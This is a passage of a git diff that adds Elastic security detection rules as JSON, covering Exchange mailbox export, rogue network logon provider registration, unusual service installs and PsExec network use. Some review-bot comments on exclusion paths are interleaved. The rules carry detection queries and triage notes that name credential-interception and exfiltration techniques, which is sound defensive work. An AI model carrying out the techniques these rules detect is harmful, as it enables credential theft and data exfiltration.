"https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + }, + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "54a81f68-5f2a-421e-8eed-f888278bb712_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_8.json b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_8.json new file mode 100644 index 00000000000..2d41733c615 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54a81f68-5f2a-421e-8eed-f888278bb712_8.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Exchange Mailbox Export via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exchange Mailbox Export via PowerShell\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. 
Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : \"New-MailboxExportRequest\" and\n not (\n file.path : (\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Exchange\\\\\\\\RemotePowerShell\\\\\\\\* or\n ?\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmp_????????.???\\\\\\\\tmp_????????.???.ps?1* or\n ?\\:\\\\\\\\Windows\\\\\\\\TEMP\\\\\\\\tmp_????????.???\\\\\\\\tmp_????????.???.ps?1*\n ) and file.name:(*.psd1 or *.psm1)\n )\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps", + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "54a81f68-5f2a-421e-8eed-f888278bb712", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide", + 
"Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.001", + "name": "Local Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/001/" + }, + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 + }, + "id": "54a81f68-5f2a-421e-8eed-f888278bb712_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_108.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_108.json new file mode 100644 index 00000000000..075fd62321b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_108.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in clear text during user logon.", + "false_positives": [ + "Authorized third party network logon providers." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Logon Provider Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Network Logon Provider Registry Modification\n\nNetwork logon providers are components in Windows responsible for handling the authentication process during a network logon.\n\nThis rule identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in plain text during user logon.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the `registry.data.strings` field to identify the DLL registered.\n- Identify the process responsible for the registry operation and the file creation and investigate their process execution chains (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Retrieve the file and examine if it is signed with valid digital signatures from vendors that are supposed to implement this kind of software and approved to use in the environment. Check for prevalence in the environment and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- False Positives can include legitimate software installations or updates that modify the network logon provider registry. 
These modifications may be necessary for the proper functioning of the software and are not indicative of malicious activity.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings : \"?*\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\"\n ) and\n /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */\n not (\n user.id : \"S-1-5-18\" and\n registry.data.strings : (\n \"%SystemRoot%\\\\System32\\\\ntlanman.dll\",\n \"%SystemRoot%\\\\System32\\\\drprov.dll\",\n \"%SystemRoot%\\\\System32\\\\davclnt.dll\",\n \"%SystemRoot%\\\\System32\\\\vmhgfs.dll\",\n \"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\x64\\\\pnsson.dll\",\n \"?:\\\\Program Files\\\\Dell\\\\SARemediation\\\\agent\\\\DellMgmtNP.dll\",\n \"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Connect\\\\\\\\epcgina.dll\"\n )\n )\n", + "references": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"54c3d186-0461-4dc3-9b33-2dc5c7473936", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "54c3d186-0461-4dc3-9b33-2dc5c7473936_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json new file mode 100644 index 00000000000..e0caffa9d25 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json 
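Review bot: The last `registry.data.strings` exclusion in the query, `"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Connect\\\\\\\\epcgina.dll"`, carries a doubled path separator before `epcgina.dll` where every other entry in the list uses a single one, so after JSON and EQL unescaping it appears to match a path containing `\\` rather than `\`. If that is not a deliberate match on a literal double separator, the exclusion never fires and Check Point hosts keep alerting for the SYSTEM-written value; if it is deliberate, a short note next to the existing `/* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */` comment would stop the next tuner from "fixing" it. The same string appears unchanged in the 54c3d186-0461-4dc3-9b33-2dc5c7473936_109.json hunk below, so both copies need the same decision.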
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in clear text during user logon.", + "false_positives": [ + "Authorized third party network logon providers." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Logon Provider Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Network Logon Provider Registry Modification\n\nNetwork logon providers are components in Windows responsible for handling the authentication process during a network logon.\n\nThis rule identifies the modification of the network logon provider registry. Adversaries may register a rogue network logon provider module for persistence and/or credential access via intercepting the authentication credentials in plain text during user logon.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the `registry.data.strings` field to identify the DLL registered.\n- Identify the process responsible for the registry operation and the file creation and investigate their process execution chains (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Retrieve the file and examine if it is signed with valid digital signatures from vendors that are supposed to implement this kind of software and approved to use in the environment. Check for prevalence in the environment and whether they are located in expected locations.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- False Positives can include legitimate software installations or updates that modify the network logon provider registry. 
These modifications may be necessary for the proper functioning of the software and are not indicative of malicious activity.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.data.strings : \"?*\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\NetworkProvider\\\\ProviderPath\"\n ) and\n /* Excluding default NetworkProviders RDPNP, LanmanWorkstation and webclient. */\n not (\n user.id : \"S-1-5-18\" and\n registry.data.strings : (\n \"%SystemRoot%\\\\System32\\\\ntlanman.dll\",\n \"%SystemRoot%\\\\System32\\\\drprov.dll\",\n \"%SystemRoot%\\\\System32\\\\davclnt.dll\",\n \"%SystemRoot%\\\\System32\\\\vmhgfs.dll\",\n \"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\x64\\\\pnsson.dll\",\n \"?:\\\\Program Files\\\\Dell\\\\SARemediation\\\\agent\\\\DellMgmtNP.dll\",\n \"?:\\\\Program Files (x86)\\\\CheckPoint\\\\Endpoint Connect\\\\\\\\epcgina.dll\"\n )\n )\n", + "references": [ + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://docs.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"54c3d186-0461-4dc3-9b33-2dc5c7473936", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "54c3d186-0461-4dc3-9b33-2dc5c7473936_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_108.json b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_108.json new file mode 100644 index 00000000000..526c8fec9a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/55c2bf58-2a39-4c58-a384-c8b1978153c2_108.json 
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Windows service by an unusual client process. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Windows Service Installed via an Unusual Client", + "query": "event.action:\"service-installed\" and\n (winlog.event_data.ClientProcessId:\"0\" or winlog.event_data.ParentProcessId:\"0\") and\n not winlog.event_data.ServiceFileName : (\n \"C:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\" or\n \"%SystemRoot%\\\\system32\\\\Drivers\\\\Crowdstrike\\\\17706-CsInstallerService.exe\"\n )\n", + "references": [ + "https://www.x86matthew.com/view_post?id=create_svc_rpc", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4697", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0100_windows_audit_security_system_extension.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ClientProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ParentProcessId", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ServiceFileName", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "55c2bf58-2a39-4c58-a384-c8b1978153c2", + "setup": "## Setup\n\nThe 'Audit Security System Extension' logging policy must be configured for (Success)\nSteps to implement the logging policy with 
Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nSystem >\nAudit Security System Extension (Success)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "55c2bf58-2a39-4c58-a384-c8b1978153c2_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_108.json b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_108.json new file mode 100644 index 00000000000..859a031bb47 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/55d551c6-333b-4665-ab7e-5d14a59715ce_108.json 
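Review bot: The `winlog.event_data.ServiceFileName` exclusion `"%SystemRoot%\\\\system32\\\\Drivers\\\\Crowdstrike\\\\17706-CsInstallerService.exe"` pins a sensor build number in the path, so it silently stops applying after the next CrowdStrike update and the rule becomes noisy on every host again. Either record in the rule's `setup` text that this entry is expected to be re-tuned per sensor release, or state that the pinned build is intentional to keep the exclusion narrow; widening it to a wildcard would trade that noise for a broader exclusion, which is a choice worth writing down. This rule also has no `false_positives` entry even though the query already carries two vendor-specific exclusions, so the known benign sources are undocumented.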
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the SysInternals tool PsExec.exe making a network connection. This could be an indication of lateral movement.", + "false_positives": [ + "PsExec is a dual-use tool that can be used for benign or malicious activity. It's important to baseline your environment to determine the amount of noise to expect from this tool." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "PsExec Network Connection", + "note": "## Triage and analysis\n\n### Investigating PsExec Network Connection\n\nPsExec is a remote administration tool that enables the execution of commands with both regular and SYSTEM privileges on Windows systems. Microsoft develops it as part of the Sysinternals Suite. Although commonly used by administrators, PsExec is frequently used by attackers to enable lateral movement and execute commands as SYSTEM to disable defenses and bypass security protections.\n\nThis rule identifies PsExec execution by looking for the creation of `PsExec.exe`, the default name for the utility, followed by a network connection done by the process.\n\n#### Possible investigation steps\n\n- Check if the usage of this tool complies with the organization's administration policy.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify the target computer and its role in the IT environment.\n- Investigate what commands were run, and assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. As long as the analyst did not identify suspicious activity related to the user or involved hosts, and the tool is allowed by the organization's policy, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - Prioritize cases involving critical servers and users.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"PsExec.exe\" and event.type == \"start\" and\n\n /* This flag suppresses the display of the license dialog and may\n indicate that psexec executed for the first time in the machine */\n process.args : \"-accepteula\" and\n\n not process.executable : (\"?:\\\\ProgramData\\\\Docusnap\\\\Discovery\\\\discovery\\\\plugins\\\\17\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Docusnap 11\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Bin\\\\psexec.exe\",\n \"?:\\\\Program Files\\\\Docusnap X\\\\Tools\\\\dsDNS.exe\") and\n not process.parent.executable : \"?:\\\\Program Files (x86)\\\\Cynet\\\\Cynet Scanner\\\\CynetScanner.exe\"]\n [network where host.os.type == \"windows\" and process.name : \"PsExec.exe\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + 
